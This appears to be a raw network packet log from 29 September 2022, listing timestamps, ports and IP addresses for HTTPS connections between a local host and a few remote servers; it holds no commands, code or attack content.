                                                                                                                                                            Sep 29, 2022 14:44:57.440074921 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.440114975 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.440114975 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.440207005 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.440226078 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.440310955 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.440310955 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.440325022 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.440429926 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.440443039 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.440464020 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.440543890 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.440543890 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.440557003 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.440593958 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.440938950 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.440959930 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441044092 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441044092 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441059113 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441099882 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441199064 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441226006 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441301107 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441301107 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441313028 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441368103 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441498041 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441517115 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441571951 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441571951 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441584110 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441610098 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441634893 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441777945 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441798925 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441888094 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441888094 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441900969 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.441955090 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.441955090 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.443197966 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.446167946 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446194887 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446306944 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.446306944 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.446329117 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446468115 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446492910 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446541071 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.446541071 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.446558952 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446603060 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.446603060 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.446727991 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446748018 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446811914 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.446834087 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.446887970 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447060108 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447088003 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447114944 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447129965 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447187901 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447189093 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447228909 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447376966 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447396040 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447501898 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447501898 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447520018 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447591066 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447675943 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447696924 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447791100 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447791100 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.447807074 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.447895050 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448021889 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448045015 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448132038 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448147058 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448163986 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448220968 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448334932 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448355913 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448437929 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448437929 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448455095 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448532104 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448682070 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448703051 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448786974 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448786974 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448803902 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448879957 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.448966980 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.448988914 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449069977 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449069977 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449084997 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449157000 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449280977 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449309111 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449388981 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449388981 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449400902 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449559927 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449583054 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449632883 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449632883 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449650049 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449707031 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449707031 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449778080 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449796915 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449887037 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449887037 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.449901104 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.449915886 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.450002909 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.450002909 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.450002909 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.450031042 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.450062990 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.450107098 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.450252056 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.450252056 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.470391035 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.470422983 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.470623016 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.470623016 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.470655918 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.470978022 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.470983028 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.470999956 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.471066952 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.471093893 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.471093893 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.471101046 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.471117020 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.471151114 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.471154928 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.471235037 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.471235037 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.471250057 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.471939087 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.486222029 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.486253977 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.486315012 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.486403942 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.486413956 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.486413956 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.486443043 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.486463070 CEST44349730185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:57.486522913 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.486522913 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.487921000 CEST49730443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:57.850667000 CEST49672443192.168.2.640.90.65.8
                                                                                                                                                            Sep 29, 2022 14:44:58.226314068 CEST49731443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.226356030 CEST44349731140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.226497889 CEST49731443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.226903915 CEST49731443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.226922035 CEST44349731140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.276066065 CEST44349731140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.277730942 CEST49731443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.277772903 CEST44349731140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.453538895 CEST44349731140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.453767061 CEST44349731140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.453875065 CEST49731443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.453906059 CEST44349731140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.453934908 CEST44349731140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.453988075 CEST49731443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.459628105 CEST49731443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.460606098 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.460686922 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.460798025 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.461256027 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.461289883 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.507313967 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.508924007 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.509013891 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694281101 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694410086 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694459915 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694467068 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.694506884 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694562912 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.694562912 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694583893 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694632053 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.694680929 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694766998 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694816113 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694816113 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.694832087 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.694895983 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.694933891 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.695440054 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.695506096 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.695523024 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.698570967 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.698605061 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.698679924 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.698707104 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.698724985 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.698765039 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.711112022 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.711163044 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.711261034 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.711296082 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.711316109 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.713587046 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.713654995 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.713761091 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.713790894 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.713809967 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.715720892 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.715761900 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.715818882 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.715852022 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.715854883 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.725450993 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.725521088 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.725693941 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.725693941 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.725754023 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.726495981 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.726537943 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.726615906 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.726645947 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.726667881 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.728305101 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.728363991 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.728418112 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.728418112 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.728454113 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.728482962 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.728483915 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.728607893 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.728641987 CEST44349732185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.728703976 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.729418993 CEST49732443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:58.907488108 CEST49733443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.907561064 CEST44349733140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.907717943 CEST49733443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.908230066 CEST49733443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.908256054 CEST44349733140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.949172020 CEST44349733140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:58.951229095 CEST49733443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:58.951251030 CEST44349733140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.451410055 CEST44349733140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.451536894 CEST44349733140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.451653004 CEST44349733140.82.121.4192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.451672077 CEST49733443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:59.451736927 CEST49733443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:59.452430964 CEST49733443192.168.2.6140.82.121.4
                                                                                                                                                            Sep 29, 2022 14:44:59.453744888 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.453826904 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.453938961 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.454333067 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.454366922 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.495872021 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.497529984 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.497561932 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799140930 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799230099 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799267054 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799320936 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799362898 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799401045 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799439907 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799458027 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.799494028 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799530983 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.799541950 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.799573898 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.799582958 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.800200939 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.800303936 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.800322056 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.803287029 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.803328037 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.803539991 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.803558111 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.815617085 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.815649033 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.815818071 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.815836906 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.817600965 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.817636013 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.817749023 CEST49734443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:44:59.817761898 CEST44349734185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:44:59.817806959 CEST49734443192.168.2.6185.199.110.133
